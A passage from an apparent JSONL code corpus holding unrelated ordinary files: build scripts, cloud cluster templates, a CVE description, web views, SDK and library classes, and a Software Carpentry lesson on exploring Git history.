MusECore\n"} {"text": "var gulp = require('gulp');\nvar sass = require('gulp-sass');\nvar autoprefixer = require('gulp-autoprefixer');\nvar sourcemaps = require('gulp-sourcemaps');\nvar cleanCSS = require('gulp-clean-css');\nvar rename = require('gulp-rename');\nvar include = require(\"gulp-include\");\nvar uglify = require('gulp-uglify');\nvar browserSync = require('browser-sync').create();\nvar reload = browserSync.reload;\nvar notify = require(\"gulp-notify\");\n\ngulp.task('sass', function () {\n return gulp.src('./assets/scss/landio.scss')\n .pipe(sourcemaps.init())\n .pipe(sass({ errLogToConsole: false, }))\n .on('error', function(err) {\n notify({\n \"sound\": \"Morse\"\n }).write(err);\n this.emit('end');\n })\n .pipe(autoprefixer({\n browsers: [\n \"Explorer >= 10\",\n \"iOS >= 9.3\", // Apple iPhone 5\n \"Android >= 5\"\n ]\n }))\n .pipe(cleanCSS())\n .pipe(rename({suffix: '.min'}))\n .pipe(sourcemaps.write('.'))\n .pipe(gulp.dest('./assets/css'))\n .pipe(browserSync.stream());\n});\n\ngulp.task('js', function() {\n return gulp.src('./assets/js/landio.js')\n .pipe(sourcemaps.init())\n .pipe(include())\n .on('error', console.log)\n .pipe(uglify())\n .pipe(rename({suffix: '.min'}))\n .pipe(sourcemaps.write('.'))\n .pipe(gulp.dest('./assets/js/'))\n .pipe(browserSync.stream());\n});\n\ngulp.task('serve', ['sass', 'js'], function() {\n browserSync.init({\n port: 3355,\n server: {\n baseDir: \"./\",\n index: \"index.html\",\n logSnippet: false\n }\n });\n\n gulp.watch('./assets/**/*.scss', ['sass']);\n gulp.watch('./assets/js/landio.js', ['js']);\n gulp.watch('./*.html').on('change', reload);\n});\n\ngulp.task('default', ['serve']);\n"} {"text": "#!/usr/bin/env bash\n#------------------------------------------------------------------------------\n# Bash+ - Modern Bash Programming\n#\n# Copyright (c) 2013 Ingy döt Net\n#------------------------------------------------------------------------------\n\nset -e\n\n#------------------------------------------------------------------------------\n# Determine how `bash+` was called, and do the right thing:\n#------------------------------------------------------------------------------\nif [ \"${BASH_SOURCE[0]}\" != \"$0\" ]; then\n # 'bash+' is being sourced:\n [[ \"${BASH_SOURCE[0]}\" =~ /bin/bash\\+$ ]] || {\n echo \"Invalid Bash+ path '${BASH_SOURCE[0]}'\" 2> /dev/null\n exit 1\n }\n source \"${BASH_SOURCE[0]%/bin/*}\"/lib/bash+.bash || return $?\n bash+:import \"$@\"\n return $?\nelse\n if [ $# -eq 1 -a \"$1\" == --version ]; then\n echo 'bash+ version 0.0.1'\n else\n cat <<...\n\nGreetings modern Bash programmer. 
Welcome to Bash+!\n\nBash+ is framework that makes Bash programming more like Ruby and Perl.\n\nSee: https://github.com/bpan-org/bashplus\n\nIf you got here trying to use bash+ in a program, you need to source it:\n\n source bash+\n\nHappy Bash Hacking!\n\n...\n fi\nfi\n"} {"text": "{\n \"name\": \"7.2.0 - Real-time Data Mart for AWS\",\n \"description\": \"\",\n \"type\": \"DATAMART\",\n \"featureState\": \"RELEASED\",\n \"cloudPlatform\": \"AWS\",\n \"distroXTemplate\": {\n \"cluster\": {\n \"blueprintName\": \"7.2.0 - Real-time Data Mart: Apache Impala, Hue, Apache Kudu, Apache Spark\"\n },\n \"instanceGroups\": [\n {\n \"name\": \"master1\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 1,\n \"size\": 100,\n \"type\": \"standard\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"r5.2xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"GATEWAY\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"master2\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 1,\n \"size\": 100,\n \"type\": \"standard\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"r5.2xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"master3\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 1,\n \"size\": 100,\n \"type\": \"standard\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"r5.2xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"coordinator\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 2,\n \"size\": 1900,\n \"type\": \"ephemeral\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"i3.4xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"executor\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 2,\n \"size\": 1900,\n \"type\": \"ephemeral\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"i3.4xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 3,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n }\n ]\n }\n}\n"} {"text": "{\n \"CVE_data_meta\": {\n \"ASSIGNER\": \"cve@mitre.org\",\n \"ID\": \"CVE-2002-1522\",\n \"STATE\": \"PUBLIC\"\n },\n \"affects\": {\n \"vendor\": {\n \"vendor_data\": [\n {\n \"product\": {\n \"product_data\": [\n {\n \"product_name\": \"n/a\",\n \"version\": {\n \"version_data\": [\n {\n \"version_value\": \"n/a\"\n }\n ]\n }\n }\n ]\n },\n \"vendor_name\": \"n/a\"\n }\n ]\n }\n },\n \"data_format\": \"MITRE\",\n \"data_type\": \"CVE\",\n \"data_version\": \"4.0\",\n \"description\": {\n \"description_data\": [\n {\n \"lang\": \"eng\",\n \"value\": \"Buffer overflow in PowerFTP FTP server 2.24, and possibly other versions, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long USER argument.\"\n }\n ]\n },\n \"problemtype\": {\n \"problemtype_data\": [\n {\n \"description\": [\n {\n \"lang\": \"eng\",\n \"value\": \"n/a\"\n }\n ]\n }\n ]\n },\n \"references\": {\n \"reference_data\": [\n {\n \"name\": \"20021005 Vulnerabilitie in PowerFTP server\",\n \"refsource\": \"BUGTRAQ\",\n \"url\": 
\"http://archives.neohapsis.com/archives/bugtraq/2002-10/0075.html\"\n },\n {\n \"name\": \"5899\",\n \"refsource\": \"BID\",\n \"url\": \"http://www.securityfocus.com/bid/5899\"\n },\n {\n \"name\": \"20021012 Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)\",\n \"refsource\": \"BUGTRAQ\",\n \"url\": \"http://archives.neohapsis.com/archives/bugtraq/2002-10/0194.html\"\n },\n {\n \"name\": \"powerftp-long-username-dos(10286)\",\n \"refsource\": \"XF\",\n \"url\": \"http://www.iss.net/security_center/static/10286.php\"\n }\n ]\n }\n}"} {"text": "\n \n \n \n \n OpenStreetMap- default options\n \n \n \n \n\n@model OSMWeb.Models.OsmConfig\n@{\n ViewBag.Title = \"Create\";\n}\n\n
<h2>Create new Feature Service</h2>
<p>
    @Html.ActionLink(\"< Back to list\", \"Index\")
</p>

@using (Html.BeginForm())
{
    @Html.ValidationSummary(true)

    @Html.Partial(\"_CreateOrEdit\", Model)

    <fieldset>
        <legend>What</legend>
        <p>
            Zoom and pan the map to the area for which you want to retrieve data from OpenStreetMap. More data takes longer to download.
        </p>
        <div>
            @Html.LabelFor(model => model.Extent)
        </div>
        <div>
            @Html.TextBoxFor(model => model.Extent, new { style = \"width: 200px\" })
            @Html.ValidationMessageFor(model => model.Extent)
        </div>
    </fieldset>

    <fieldset>
        <legend>How</legend>
        <p>
            What should the service be named? What data should be symbolized (using the template dropdown below)? Do you want to synchronize with OpenStreetMap?
        </p>
        <div>
            @Html.LabelFor(model => model.FeatureDataSet)
        </div>
        <div>
            @Html.EditorFor(model => model.FeatureDataSet)
            @Html.ValidationMessageFor(model => model.FeatureDataSet)
        </div>
        <div>
            @Html.LabelFor(model => model.MxdTemplate)
        </div>
        <div>
            @{
                var mxdList = @ViewBag.mxdList as IEnumerable;
            }
            @Html.DropDownListFor(model => model.MxdTemplate, mxdList)
        </div>

        <div>
            Synchronize with OpenStreetMap?
        </div>
        <div>
            @Html.LabelFor(model => model.Username)
        </div>
        <div>
            @Html.EditorFor(model => model.Username)
            @Html.ValidationMessageFor(model => model.Username)
        </div>
        <div>
            @Html.LabelFor(model => model.Password)
        </div>
        <div>
            @Html.PasswordFor(model => model.Password)
            @Html.ValidationMessageFor(model => model.Password)
        </div>
        <div>
            @ViewBag.AlphaCheck
        </div>

        <div>
            @Html.LabelFor(model => model.RefreshInterval)
        </div>
        <div>
            @{
                var refreshList = @ViewBag.refreshList as IEnumerable;
            }
            @Html.DropDownListFor(model => model.RefreshInterval, refreshList)
        </div>
    </fieldset>

    <p>
        @*Make sure this return true makes a request and postback on all browsers*@
        <input type=\"submit\" value=\"Create\" />
        @Html.ActionLink(\"Cancel\", \"Index\")
        @**@
    </p>
}
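
@*
    A minimal sketch, not part of the original project: based only on the properties this
    view binds (Extent, FeatureDataSet, MxdTemplate, Username, Password, RefreshInterval),
    the OSMWeb.Models.OsmConfig model behind the form might look roughly like the class
    below. Property types and member comments are assumptions for illustration.

    public class OsmConfig
    {
        public string Extent { get; set; }            // map extent to download from OpenStreetMap
        public string FeatureDataSet { get; set; }     // name under which the feature service is published
        public string MxdTemplate { get; set; }        // symbology template selected from ViewBag.mxdList
        public string Username { get; set; }           // OpenStreetMap credentials, only needed when synchronizing
        public string Password { get; set; }
        public string RefreshInterval { get; set; }    // synchronization interval selected from ViewBag.refreshList
    }
*@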
"} {"text": "import { ServiceInputTypes, ServiceOutputTypes, WorkLinkClientResolvedConfig } from \"../WorkLinkClient\";\nimport { UntagResourceRequest, UntagResourceResponse } from \"../models/models_0\";\nimport {\n deserializeAws_restJson1UntagResourceCommand,\n serializeAws_restJson1UntagResourceCommand,\n} from \"../protocols/Aws_restJson1\";\nimport { getSerdePlugin } from \"@aws-sdk/middleware-serde\";\nimport { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from \"@aws-sdk/protocol-http\";\nimport { Command as $Command } from \"@aws-sdk/smithy-client\";\nimport {\n FinalizeHandlerArguments,\n Handler,\n HandlerExecutionContext,\n MiddlewareStack,\n HttpHandlerOptions as __HttpHandlerOptions,\n MetadataBearer as __MetadataBearer,\n SerdeContext as __SerdeContext,\n} from \"@aws-sdk/types\";\n\nexport type UntagResourceCommandInput = UntagResourceRequest;\nexport type UntagResourceCommandOutput = UntagResourceResponse & __MetadataBearer;\n\nexport class UntagResourceCommand extends $Command<\n UntagResourceCommandInput,\n UntagResourceCommandOutput,\n WorkLinkClientResolvedConfig\n> {\n // Start section: command_properties\n // End section: command_properties\n\n constructor(readonly input: UntagResourceCommandInput) {\n // Start section: command_constructor\n super();\n // End section: command_constructor\n }\n\n resolveMiddleware(\n clientStack: MiddlewareStack,\n configuration: WorkLinkClientResolvedConfig,\n options?: __HttpHandlerOptions\n ): Handler {\n this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize));\n\n const stack = clientStack.concat(this.middlewareStack);\n\n const { logger } = configuration;\n const handlerExecutionContext: HandlerExecutionContext = {\n logger,\n inputFilterSensitiveLog: UntagResourceRequest.filterSensitiveLog,\n outputFilterSensitiveLog: UntagResourceResponse.filterSensitiveLog,\n };\n const { requestHandler } = configuration;\n return stack.resolve(\n (request: FinalizeHandlerArguments) =>\n requestHandler.handle(request.request as __HttpRequest, options || {}),\n handlerExecutionContext\n );\n }\n\n private serialize(input: UntagResourceCommandInput, context: __SerdeContext): Promise<__HttpRequest> {\n return serializeAws_restJson1UntagResourceCommand(input, context);\n }\n\n private deserialize(output: __HttpResponse, context: __SerdeContext): Promise {\n return deserializeAws_restJson1UntagResourceCommand(output, context);\n }\n\n // Start section: command_body_extra\n // End section: command_body_extra\n}\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.\n//\n\n#import \n\n#import \n\n@class NSString;\n@protocol OS_os_transaction;\n\n@interface PFLoggerBackendAdapter : NSObject \n{\n // Error parsing type: AQ, name: _pendingTransactionCount\n NSObject *_transaction;\n BOOL _runningUnderDebugger;\n}\n\n+ (long long)parseByteSizeValueForKey:(id)arg1 inString:(id)arg2;\n+ (long long)allFileSizeMaxBytesFromString:(id)arg1;\n+ (long long)fileSizeMaxBytesFromString:(id)arg1;\n+ (id)pathWithoutParametersFromString:(id)arg1;\n+ (id)backendsFromUserDefaultsWithLogLevel:(int)arg1;\n- (void).cxx_destruct;\n@property BOOL runningUnderDebugger; // @synthesize runningUnderDebugger=_runningUnderDebugger;\n- (void)flushWithCompletionHandler:(CDUnknownBlockType)arg1;\n@property(readonly, nonatomic) BOOL outputsToDebuggerConsole;\n@property(readonly, nonatomic) BOOL 
formatsMessage;\n@property(readonly, nonatomic) BOOL allowsConcurrentAccess;\n- (void)endTransaction;\n- (void)beginTransaction;\n- (void)logFromCodeLocation:(CDStruct_98c8119d)arg1 facility:(id)arg2 subsystem:(id)arg3 level:(int)arg4 message:(id)arg5 format:(id)arg6 args:(struct __va_list_tag [1])arg7;\n- (id)init;\n\n// Remaining properties\n@property(readonly, copy) NSString *debugDescription;\n@property(readonly, copy) NSString *description;\n@property(readonly) unsigned long long hash;\n@property(readonly) Class superclass;\n\n@end\n\n"} {"text": "package tech.wetech.weshop.common.exception;\n\nimport tech.wetech.weshop.common.utils.ResultStatus;\n\npublic class WeshopException extends RuntimeException {\n\n ResultStatus status;\n\n\tpublic WeshopException(ResultStatus status) {\n //不生成栈追踪信息\n super(status.getMsg(), null, false, false);\n this.status = status;\n }\n\n public ResultStatus getStatus() {\n return status;\n }\n\n public void setStatus(ResultStatus status) {\n this.status = status;\n }\n}\n"} {"text": "/*\n * Hibernate, Relational Persistence for Idiomatic Java\n *\n * License: GNU Lesser General Public License (LGPL), version 2.1 or later.\n * See the lgpl.txt file in the root directory or .\n */\npackage org.hibernate.engine.jdbc.dialect.internal;\n\nimport org.hibernate.dialect.Database;\nimport org.hibernate.dialect.Dialect;\nimport org.hibernate.engine.jdbc.dialect.spi.DialectResolutionInfo;\nimport org.hibernate.engine.jdbc.dialect.spi.DialectResolver;\n\n/**\n * The standard DialectResolver implementation\n *\n * @author Steve Ebersole\n */\npublic final class StandardDialectResolver implements DialectResolver {\n\n\t@Override\n\tpublic Dialect resolveDialect(DialectResolutionInfo info) {\n\n\t\tfor ( Database database : Database.values() ) {\n\t\t\tDialect dialect = database.resolveDialect( info );\n\t\t\tif ( dialect != null ) {\n\t\t\t\treturn dialect;\n\t\t\t}\n\t\t}\n\n\t\treturn null;\n\t}\n}\n"} {"text": "#region Copyright (C) 2007-2018 Team MediaPortal\n\n/*\n Copyright (C) 2007-2018 Team MediaPortal\n http://www.team-mediaportal.com\n\n This file is part of MediaPortal 2\n\n MediaPortal 2 is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n MediaPortal 2 is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with MediaPortal 2. If not, see .\n*/\n\n#endregion\n\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Threading.Tasks;\nusing MediaPortal.Common;\nusing MediaPortal.Common.MediaManagement;\nusing MediaPortal.Common.SystemCommunication;\n\nnamespace MediaPortal.DevTools\n{\n /// \n /// Media item aspect type registration class for the MediaPortal client. 
Stores all registered media item aspect types\n /// and automatically registers them at the connected server.\n /// \n public class MediaItemAspectTypeRegistration : IMediaItemAspectTypeRegistration\n {\n protected IDictionary _locallyKnownMediaItemAspectTypes = new Dictionary();\n protected IDictionary _locallySupportedReimportMediaItemAspectTypes = new Dictionary();\n\n public IDictionary LocallyKnownMediaItemAspectTypes\n {\n get { return _locallyKnownMediaItemAspectTypes; }\n }\n\n public IDictionary LocallySupportedReimportMediaItemAspectTypes\n {\n get { return _locallySupportedReimportMediaItemAspectTypes; }\n }\n\n public async Task RegisterLocallyKnownMediaItemAspectTypeAsync(IEnumerable miaTypes)\n {\n await Task.WhenAll(miaTypes.Select(RegisterLocallyKnownMediaItemAspectTypeAsync));\n }\n\n public Task RegisterLocallyKnownMediaItemAspectTypeAsync(MediaItemAspectMetadata miaType)\n {\n if (_locallyKnownMediaItemAspectTypes.ContainsKey(miaType.AspectId))\n return Task.CompletedTask;\n _locallyKnownMediaItemAspectTypes.Add(miaType.AspectId, miaType);\n IServerConnectionManager serverConnectionManager = ServiceRegistration.Get();\n IContentDirectory cd = serverConnectionManager == null ? null :\n serverConnectionManager.ContentDirectory;\n if (cd != null)\n cd.AddMediaItemAspectStorageAsync(miaType).Wait();\n return Task.CompletedTask;\n }\n\n public Task RegisterLocallySupportedReimportMediaItemAspectTypeAsync(MediaItemAspectMetadata miaType)\n {\n Console.WriteLine(\"Registering reimport support \" + miaType.Name);\n if (!_locallySupportedReimportMediaItemAspectTypes.ContainsKey(miaType.AspectId))\n _locallySupportedReimportMediaItemAspectTypes.Add(miaType.AspectId, miaType);\n return Task.CompletedTask;\n }\n }\n}\n"} {"text": "(function() {\n 'use strict';\n\n angular\n .module('erpApp')\n .config(stateConfig);\n\n stateConfig.$inject = ['$stateProvider'];\n\n function stateConfig($stateProvider) {\n $stateProvider.state('jhi-health', {\n parent: 'admin',\n url: '/health',\n data: {\n authorities: ['ROLE_ADMIN'],\n pageTitle: 'health.title'\n },\n views: {\n 'content@app': {\n templateUrl: 'app/admin/health/health.html',\n controller: 'JhiHealthCheckController',\n controllerAs: 'vm'\n }\n },\n resolve: {\n translatePartialLoader: ['$translate', '$translatePartialLoader', function ($translate, $translatePartialLoader) {\n $translatePartialLoader.addPart('health');\n return $translate.refresh();\n }]\n }\n });\n }\n})();\n"} {"text": "---\ntitle: Exploring History\nteaching: 25\nexercises: 0\nquestions:\n- \"How can I identify old versions of files?\"\n- \"How do I review my changes?\"\n- \"How can I recover old versions of files?\"\nobjectives:\n- \"Explain what the HEAD of a repository is and how to use it.\"\n- \"Identify and use Git commit numbers.\"\n- \"Compare various versions of tracked files.\"\n- \"Restore old versions of files.\"\nkeypoints:\n- \"`git diff` displays differences between commits.\"\n- \"`git checkout` recovers old versions of files.\"\n---\n\nAs we saw in the previous lesson, we can refer to commits by their\nidentifiers. You can refer to the _most recent commit_ of the working\ndirectory by using the identifier `HEAD`.\n\nWe've been adding one line at a time to `mars.txt`, so it's easy to track our\nprogress by looking, so let's do that using our `HEAD`s. 
Before we start,\nlet's make a change to `mars.txt`, adding yet another line.\n\n~~~\n$ nano mars.txt\n$ cat mars.txt\n~~~\n{: .language-bash}\n\n~~~\nCold and dry, but everything is my favorite color\nThe two moons may be a problem for Wolfman\nBut the Mummy will appreciate the lack of humidity\nAn ill-considered change\n~~~\n{: .output}\n\nNow, let's see what we get.\n\n~~~\n$ git diff HEAD mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex b36abfd..0848c8d 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1,3 +1,4 @@\n Cold and dry, but everything is my favorite color\n The two moons may be a problem for Wolfman\n But the Mummy will appreciate the lack of humidity\n+An ill-considered change.\n~~~\n{: .output}\n\nwhich is the same as what you would get if you leave out `HEAD` (try it). The\nreal goodness in all this is when you can refer to previous commits. We do\nthat by adding `~1` \n(where \"~\" is \"tilde\", pronounced [**til**-d*uh*]) \nto refer to the commit one before `HEAD`.\n\n~~~\n$ git diff HEAD~1 mars.txt\n~~~\n{: .language-bash}\n\nIf we want to see the differences between older commits we can use `git diff`\nagain, but with the notation `HEAD~1`, `HEAD~2`, and so on, to refer to them:\n\n\n~~~\n$ git diff HEAD~3 mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex df0654a..b36abfd 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1 +1,4 @@\n Cold and dry, but everything is my favorite color\n+The two moons may be a problem for Wolfman\n+But the Mummy will appreciate the lack of humidity\n+An ill-considered change\n~~~\n{: .output}\n\nWe could also use `git show` which shows us what changes we made at an older commit as \nwell as the commit message, rather than the _differences_ between a commit and our \nworking directory that we see by using `git diff`.\n\n~~~\n$ git show HEAD~3 mars.txt\n~~~\n{: .language-bash}\n\n~~~\ncommit f22b25e3233b4645dabd0d81e651fe074bd8e73b\nAuthor: Vlad Dracula \nDate: Thu Aug 22 09:51:46 2013 -0400\n\n Start notes on Mars as a base\n\ndiff --git a/mars.txt b/mars.txt\nnew file mode 100644\nindex 0000000..df0654a\n--- /dev/null\n+++ b/mars.txt\n@@ -0,0 +1 @@\n+Cold and dry, but everything is my favorite color\n~~~\n{: .output}\n\nIn this way,\nwe can build up a chain of commits.\nThe most recent end of the chain is referred to as `HEAD`;\nwe can refer to previous commits using the `~` notation,\nso `HEAD~1`\nmeans \"the previous commit\",\nwhile `HEAD~123` goes back 123 commits from where we are now.\n\nWe can also refer to commits using\nthose long strings of digits and letters\nthat `git log` displays.\nThese are unique IDs for the changes,\nand \"unique\" really does mean unique:\nevery change to any set of files on any computer\nhas a unique 40-character identifier.\nOur first commit was given the ID\n`f22b25e3233b4645dabd0d81e651fe074bd8e73b`,\nso let's try this:\n\n~~~\n$ git diff f22b25e3233b4645dabd0d81e651fe074bd8e73b mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex df0654a..93a3e13 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1 +1,4 @@\n Cold and dry, but everything is my favorite color\n+The two moons may be a problem for Wolfman\n+But the Mummy will appreciate the lack of humidity\n+An ill-considered change\n~~~\n{: .output}\n\nThat's the right answer,\nbut typing out random 40-character strings is annoying,\nso Git lets us use just the first few characters (typically seven for normal size projects):\n\n~~~\n$ git diff f22b25e mars.txt\n~~~\n{: 
.language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex df0654a..93a3e13 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1 +1,4 @@\n Cold and dry, but everything is my favorite color\n+The two moons may be a problem for Wolfman\n+But the Mummy will appreciate the lack of humidity\n+An ill-considered change\n~~~\n{: .output}\n\nAll right! So\nwe can save changes to files and see what we've changed. Now, how\ncan we restore older versions of things?\nLet's suppose we change our mind about the last update to\n`mars.txt` (the \"ill-considered change\").\n\n`git status` now tells us that the file has been changed,\nbut those changes haven't been staged:\n\n~~~\n$ git status\n~~~\n{: .language-bash}\n\n~~~\nOn branch master\nChanges not staged for commit:\n (use \"git add ...\" to update what will be committed)\n (use \"git checkout -- ...\" to discard changes in working directory)\n\n modified: mars.txt\n\nno changes added to commit (use \"git add\" and/or \"git commit -a\")\n~~~\n{: .output}\n\nWe can put things back the way they were\nby using `git checkout`:\n\n~~~\n$ git checkout HEAD mars.txt\n$ cat mars.txt\n~~~\n{: .language-bash}\n\n~~~\nCold and dry, but everything is my favorite color\nThe two moons may be a problem for Wolfman\nBut the Mummy will appreciate the lack of humidity\n~~~\n{: .output}\n\nAs you might guess from its name,\n`git checkout` checks out (i.e., restores) an old version of a file.\nIn this case,\nwe're telling Git that we want to recover the version of the file recorded in `HEAD`,\nwhich is the last saved commit.\nIf we want to go back even further,\nwe can use a commit identifier instead:\n\n~~~\n$ git checkout f22b25e mars.txt\n~~~\n{: .language-bash}\n\n~~~\n$ cat mars.txt\n~~~\n{: .language-bash}\n\n~~~\nCold and dry, but everything is my favorite color\n~~~\n{: .output}\n\n~~~\n$ git status\n~~~\n{: .language-bash}\n\n~~~\nOn branch master\nChanges to be committed:\n (use \"git reset HEAD ...\" to unstage)\n\n modified: mars.txt\n\n~~~\n{: .output}\n\nNotice that the changes are currently in the staging area.\nAgain, we can put things back the way they were\nby using `git checkout`:\n\n~~~\n$ git checkout HEAD mars.txt\n~~~\n{: .language-bash}\n\n> ## Don't Lose Your HEAD\n>\n> Above we used\n>\n> ~~~\n> $ git checkout f22b25e mars.txt\n> ~~~\n> {: .language-bash}\n>\n> to revert `mars.txt` to its state after the commit `f22b25e`. But be careful! \n> The command `checkout` has other important functionalities and Git will misunderstand\n> your intentions if you are not accurate with the typing. For example, \n> if you forget `mars.txt` in the previous command.\n>\n> ~~~\n> $ git checkout f22b25e\n> ~~~\n> {: .language-bash}\n> ~~~\n> Note: checking out 'f22b25e'.\n>\n> You are in 'detached HEAD' state. You can look around, make experimental\n> changes and commit them, and you can discard any commits you make in this\n> state without impacting any branches by performing another checkout.\n>\n> If you want to create a new branch to retain commits you create, you may\n> do so (now or later) by using -b with the checkout command again. 
Example:\n>\n> git checkout -b \n>\n> HEAD is now at f22b25e Start notes on Mars as a base\n> ~~~\n> {: .error}\n>\n> The \"detached HEAD\" is like \"look, but don't touch\" here,\n> so you shouldn't make any changes in this state.\n> After investigating your repo's past state, reattach your `HEAD` with `git checkout master`.\n{: .callout}\n\nIt's important to remember that\nwe must use the commit number that identifies the state of the repository\n*before* the change we're trying to undo.\nA common mistake is to use the number of\nthe commit in which we made the change we're trying to discard.\nIn the example below, we want to retrieve the state from before the most\nrecent commit (`HEAD~1`), which is commit `f22b25e`:\n\n![Git Checkout](../fig/git-checkout.svg)\n\nSo, to put it all together,\nhere's how Git works in cartoon form:\n\n![https://figshare.com/articles/How_Git_works_a_cartoon/1328266](../fig/git_staging.svg)\n\n> ## Simplifying the Common Case\n>\n> If you read the output of `git status` carefully,\n> you'll see that it includes this hint:\n>\n> ~~~\n> (use \"git checkout -- ...\" to discard changes in working directory)\n> ~~~\n> {: .language-bash}\n>\n> As it says,\n> `git checkout` without a version identifier restores files to the state saved in `HEAD`.\n> The double dash `--` is needed to separate the names of the files being recovered\n> from the command itself:\n> without it,\n> Git would try to use the name of the file as the commit identifier.\n{: .callout}\n\nThe fact that files can be reverted one by one\ntends to change the way people organize their work.\nIf everything is in one large document,\nit's hard (but not impossible) to undo changes to the introduction\nwithout also undoing changes made later to the conclusion.\nIf the introduction and conclusion are stored in separate files,\non the other hand,\nmoving backward and forward in time becomes much easier.\n\n> ## Recovering Older Versions of a File\n>\n> Jennifer has made changes to the Python script that she has been working on for weeks, and the\n> modifications she made this morning \"broke\" the script and it no longer runs. She has spent\n> ~ 1hr trying to fix it, with no luck...\n>\n> Luckily, she has been keeping track of her project's versions using Git! Which commands below will\n> let her recover the last committed version of her Python script called\n> `data_cruncher.py`?\n>\n> 1. `$ git checkout HEAD`\n>\n> 2. `$ git checkout HEAD data_cruncher.py`\n>\n> 3. `$ git checkout HEAD~1 data_cruncher.py`\n>\n> 4. `$ git checkout data_cruncher.py`\n>\n> 5. Both 2 and 4\n>\n>\n> > ## Solution\n> >\n> > The answer is (5)-Both 2 and 4. \n> > \n> > The `checkout` command restores files from the repository, overwriting the files in your working \n> > directory. Answers 2 and 4 both restore the *latest* version *in the repository* of the file \n> > `data_cruncher.py`. Answer 2 uses `HEAD` to indicate the *latest*, whereas answer 4 uses the \n> > unique ID of the last commit, which is what `HEAD` means. \n> > \n> > Answer 3 gets the version of `data_cruncher.py` from the commit *before* `HEAD`, which is NOT \n> > what we wanted.\n> > \n> > Answer 1 can be dangerous! Without a filename, `git checkout` will restore **all files** \n> > in the current directory (and all directories below it) to their state at the commit specified. 
\n> > This command will restore `data_cruncher.py` to the latest commit version, but it will also \n> > restore *any other files that are changed* to that version, erasing any changes you may \n> > have made to those files!\n> > As discussed above, you are left in a *detached* `HEAD` state, and you don't want to be there.\n> {: .solution}\n{: .challenge}\n\n> ## Reverting a Commit\n>\n> Jennifer is collaborating on her Python script with her colleagues and\n> realizes her last commit to the project's repository contained an error and\n> she wants to undo it. `git revert [erroneous commit ID]` will create a new \n> commit that reverses Jennifer's erroneous commit. Therefore `git revert` is\n> different to `git checkout [commit ID]` because `git checkout` returns the\n> files within the local repository to a previous state, whereas `git revert`\n> reverses changes committed to the local and project repositories. \n> Below are the right steps and explanations for Jennifer to use `git revert`,\n> what is the missing command?\n>\n> 1. `________ # Look at the git history of the project to find the commit ID`\n>\n> 2. Copy the ID (the first few characters of the ID, e.g. 0b1d055).\n>\n> 3. `git revert [commit ID]`\n>\n> 4. Type in the new commit message.\n>\n> 5. Save and close\n{: .challenge}\n\n> ## Understanding Workflow and History\n>\n> What is the output of the last command in\n>\n> ~~~\n> $ cd planets\n> $ echo \"Venus is beautiful and full of love\" > venus.txt\n> $ git add venus.txt\n> $ echo \"Venus is too hot to be suitable as a base\" >> venus.txt\n> $ git commit -m \"Comment on Venus as an unsuitable base\"\n> $ git checkout HEAD venus.txt\n> $ cat venus.txt #this will print the contents of venus.txt to the screen\n> ~~~\n> {: .language-bash}\n>\n> 1. ~~~\n> Venus is too hot to be suitable as a base\n> ~~~\n> {: .output}\n> 2. ~~~\n> Venus is beautiful and full of love\n> ~~~\n> {: .output}\n> 3. ~~~\n> Venus is beautiful and full of love\n> Venus is too hot to be suitable as a base\n> ~~~\n> {: .output}\n> 4. ~~~\n> Error because you have changed venus.txt without committing the changes\n> ~~~\n> {: .output}\n>\n> > ## Solution\n> >\n> > The 